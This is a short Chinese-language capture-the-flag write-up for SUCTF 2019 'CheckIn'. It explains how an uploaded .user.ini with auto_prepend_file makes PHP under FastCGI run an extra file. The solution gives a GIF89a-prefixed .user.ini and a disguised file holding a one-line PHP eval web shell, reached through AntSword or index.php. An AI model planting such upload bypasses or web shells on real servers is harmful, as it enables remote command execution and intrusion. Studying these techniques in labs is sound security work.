[SUCTF 2019] CheckIn 1

知识点

上传.user.ini文件，条件如下：
(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI／FastCGI模式

现在大部分网站都是用的fastcgi，这个东西我理解的是可以提供web服务器的一种api，而apache/nginx/iis这些服务器都会依靠这种api来运行

而在服务器以fastcgi启动运行的时候，.user.ini也是php的一种配置文件，众所周知php.ini是php的配置文件，它可以做到显示报错，导入扩展，文件解析，web站点路径等等设置。但是如果想要把某个文件里面的配置与全局的php.ini不同，则可以在php文件中加上ini_set()来配置特定的配置变量。

而.user.ini和.htaccess一样是对当前目录的所以php文件的配置设置，即写了.user.ini和它同目录的文件会优先使用.user.ini中设置的配置属性。

但是不是php.ini中的每个变量都能通过ini_set()或者.user.ini和.htaccess来设置，简单的来说每个变量有它所属于的模式。

利用点就是auto_prepend_file=1.feng
这个auto_prepend_file就是指定一个文件在主文件解析前解析。这个配置在涉及到FPM的题里可以说是非常常见了，几乎每次和FPM有关的题都要利用这个配置。

WP

经过各种测试，后缀没法绕过。经过多次上传，发现他返回的数组就是上传的目录下已有的文件。但是已有一个index.php有点可疑。可以想到上传.user.ini需要上传的目录里有一个php文件。因此上传.user.ini:

内容是：

GIF89a? 
auto_prepend_file=1.feng(某些环境要"1.feng")

然后再上传1.feng:

内容：

GIF89a? <script language="php">eval($_REQUEST['feng'])</script>

然后蚁剑连或者在index.php里面进行命令执行就可以了。可以查看一下phpinfo()，发现并没有disable function和open_basedir的限制，因此直接执行系统命令找flag就可以了。
因为它会定时删文件，所以如果时间长了需要重新上传。